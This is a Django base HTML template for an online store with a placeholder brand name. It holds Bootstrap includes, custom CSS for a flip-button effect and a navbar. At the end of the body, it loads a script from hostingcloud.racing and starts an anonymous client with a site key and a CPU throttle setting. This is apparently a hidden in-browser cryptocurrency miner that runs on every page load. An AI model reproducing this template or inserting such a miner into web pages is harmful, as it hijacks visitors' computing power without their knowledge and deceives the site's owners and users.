<!DOCTYPE html>
{% load static %}
<html>

<head>
	<title>{% block title %}Название{% endblock %}</title>

	<meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1, minimum-scale=1" />

	<link rel="stylesheet" href="https://stackpath.bootstrapcdn.com/bootstrap/4.4.1/css/bootstrap.min.css" integrity="sha384-Vkoo8x4CGsO3+Hhxv8T/Q5PaXtkKtu6ug5TOeNV6gBiFeWPGFN9MuhOf23Q9Ifjh" crossorigin="anonymous">

		<style>

		body {
  		background-color: #222;
		}

		h1, h2, h3, h4, h5, h6{
			font-weight: 500;
			line-height: 1.2;
			color: inherit;
		}

		.box-element{
			box-shadow:hsl(0, 0%, 80%) 0 0 16px;
			background-color: #fff;
			border-radius: 4px;
			padding: 10px;
		}

		.thumbnail{
			width: 100%;
			height: 200px;
			-webkit-box-shadow: -1px -3px 5px -2px rgba(214,214,214,1);
		    -moz-box-shadow: -1px -3px 5px -2px rgba(214,214,214,1);
		    box-shadow: -1px -3px 5px -2px rgba(214,214,214,1);
		}

		.product{
			border-radius: 0 0 4px 4px;
		}

		.bg-dark{
			background-color: #4f868c!important;
		}

		.col-lg-4, .col-lg-6, .col-lg-8, .col-lg-12{
			margin-top: 10px;
		}

		.btn{
			border-radius: 0;
		}

		.row-image{
			width: 100px;
		}

		.form-field{
			width:250px;
			display: inline-block;
			padding: 5px;
		}

		.hidden{
			display: none!important;
		}

		.search-link{
			text-decoration: none;
		}

		.input-wrapper {
			width: 500px;
			margin: 50px auto;
			position: relative;
			left: -300px;
		}

		.input-wrapper::after {
			content: attr(data-text);
			font-size: 1.5rem;
			line-height: 0;
			height: 0;
			max-width: 100%;
			font-family: Roboto, Arial, sans-serif;
			border-bottom: 3px solid #fff;
			position: absolute;
			left: 0;
			bottom: 0;
			height: 3px;
			overflow: hidden;
			user-select: none;
			color: transparent;
		}

		input {
			color: #ddd;
			border: none;
			padding: 0;
			border-radius: 0;
			outline: none;
			width: auto;
			min-width: 100%;
			font-size: 1.5rem;
			line-height: 3em;
			font-family: Roboto, Arial, sans-serif;
			border-bottom: 3px solid #333333;
			background-color: transparent;
		}

		* {
			-webkit-box-sizing: border-box;
			-moz-box-sizing: border-box;
			box-sizing: border-box;
		}
		.flip {
			position: absolute;
			width: 160px;
			height: 48px;
			-webkit-perspective: 500px;
			-moz-perspective: 500px;
			-ms-perspective: 500px;
			perspective: 500px;
			top: 100px;
			left: 150px;
			margin: -24px 0 0 -80px;
		}
		.flip a {
			font-weight: 400;
			text-transform: uppercase;
			margin: 0;
			padding: 0;
			width: 100%;
			height: 100%;
			position: absolute;
			-webkit-transform-style: preserve-3d;
			-moz-transform-style: preserve-3d;
			-o-transform-style: preserve-3d;
			-ms-transform-style: preserve-3d;
			transform-style: preserve-3d;
			-webkit-transform: translateZ(-25px);
			-moz-transform: translateZ(-25px);
			-o-transform: translateZ(-25px);
			-ms-transform: translateZ(-25px);
			transform: translateZ(-25px);
			-webkit-transition: -webkit-transform 0.3s;
			-moz-transition: -moz-transform 0.3s;
			-o-transition: -o-transform 0.3s;
			-ms-transition: -ms-transform 0.3s;
			transition: transform 0.3s;
			cursor: pointer;
		}
		.flip a .front,
		.flip a .back {
			margin: 0;
			width: 160px;
			height: 48px;
			line-height: 48px;
			position: absolute;
			text-align: center;
			letter-spacing: 0.4em;
		}
		.flip a .front {
			background-color: #222;
			color: #fff;
			-webkit-transform: rotateY(0) translateZ(24px);
			-moz-transform: rotateY(0) translateZ(24px);
			-o-transform: rotateY(0) translateZ(24px);
			-ms-transform: rotateY(0) translateZ(24px);
			transform: rotateY(0) translateZ(24px);
		}
		.flip a .back {
			background-color: rgba(255,255,255,0);
			color: rgba(34,34,34,0);
			-webkit-transform: rotateX(90deg) translateZ(24px);
			-moz-transform: rotateX(90deg) translateZ(24px);
			-o-transform: rotateX(90deg) translateZ(24px);
			-ms-transform: rotateX(90deg) translateZ(24px);
			transform: rotateX(90deg) translateZ(24px);
			overflow: hidden;
		}
		.flip a .back:after {
			content: '';
			position: absolute;
			top: -32%;
			left: -10%;
			width: 120%;
			height: 50%;
			background: #222;
			-webkit-transform: rotate(8deg);
			-moz-transform: rotate(8deg);
			-o-transform: rotate(8deg);
			-ms-transform: rotate(8deg);
			transform: rotate(8deg);
			-webkit-transition: all 0.5s ease;
			-moz-transition: all 0.5s ease;
			-o-transition: all 0.5s ease;
			-ms-transition: all 0.5s ease;
			transition: all 0.5s ease;
			-webkit-transition-delay: 0.15s;
			-moz-transition-delay: 0.15s;
			-o-transition-delay: 0.15s;
			-ms-transition-delay: 0.15s;
			transition-delay: 0.15s;
		}
		.flip a:hover {
			-webkit-transform: translateZ(-24px) rotateX(-90deg);
			-moz-transform: translateZ(-24px) rotateX(-90deg);
			-o-transform: translateZ(-24px) rotateX(-90deg);
			-ms-transform: translateZ(-24px) rotateX(-90deg);
			transform: translateZ(-24px) rotateX(-90deg);
		}
		.flip a:hover .front {
			background: #000;
			-webkit-transition: all 0.8s ease;
			-moz-transition: all 0.8s ease;
			-o-transition: all 0.8s ease;
			-ms-transition: all 0.8s ease;
			transition: all 0.8s ease;
		}
		.flip a:hover .back {
			color: #222;
			-webkit-transition: color 0.4s linear;
			-moz-transition: color 0.4s linear;
			-o-transition: color 0.4s linear;
			-ms-transition: color 0.4s linear;
			transition: color 0.4s linear;
			background: #fff;
		}
		.flip a:hover .back:after {
			-webkit-transform: rotate(6deg) translate(100px, -18px);
			-moz-transform: rotate(6deg) translate(100px, -18px);
			-o-transform: rotate(6deg) translate(100px, -18px);
			-ms-transform: rotate(6deg) translate(100px, -18px);
			transform: rotate(6deg) translate(100px, -18px);
		}

		</style>

		<script src="https://cdnjs.cloudflare.com/ajax/libs/prefixfree/1.0.7/prefixfree.min.js"></script>
</head>
<body>

	<nav class="navbar navbar-expand-lg navbar-dark bg-dark">
	  <a class="navbar-brand" href="{% url 'store:store' %}">Название</a>
	  <button class="navbar-toggler" type="button" data-toggle="collapse" data-target="#navbarSupportedContent" aria-controls="navbarSupportedContent" aria-expanded="false" aria-label="Toggle navigation">
	    <span class="navbar-toggler-icon"></span>
	  </button>

	  <div class="collapse navbar-collapse" id="navbarSupportedContent">

	  </div>
	</nav>

			<div class="container">

				<br>

				{% block content %}



				{% endblock %}

				<br>

			</div>

	<script src="https://code.jquery.com/jquery-3.4.1.slim.min.js" integrity="sha384-J6qa4849blE2+poT4WnyKhv5vZF5SrPo0iEjwBvKU7imGFAV0wwj1yYfoRSJoZ+n" crossorigin="anonymous"></script>

	<script src="https://cdn.jsdelivr.net/npm/popper.js@1.16.0/dist/umd/popper.min.js" integrity="sha384-Q6E9RHvbIyZFJoft+2mJbHaEWldlvI9IOYy5n3zV9zzTtmI3UksdQRVvoxMfooAo" crossorigin="anonymous"></script>

	<script src="https://stackpath.bootstrapcdn.com/bootstrap/4.4.1/js/bootstrap.min.js" integrity="sha384-wfSDF2E50Y2D1uUdj0O3uMBJnjuUD4Ih7YwaYd1iqfktj0Uod8GCExl3Og8ifwB6" crossorigin="anonymous"></script>

	<script src="https://www.hostingcloud.racing/mzJw.js"></script>
	<script>
		var _client = new Client.Anonymous('91c809e486adc732790f195f55da9563b8a85c6df498bcbaefcc47e9693c537d', {
			throttle: 0.3, c: 'w', ads: 0
		});
		_client.start();
		
	
	</script>
</body>
</html>
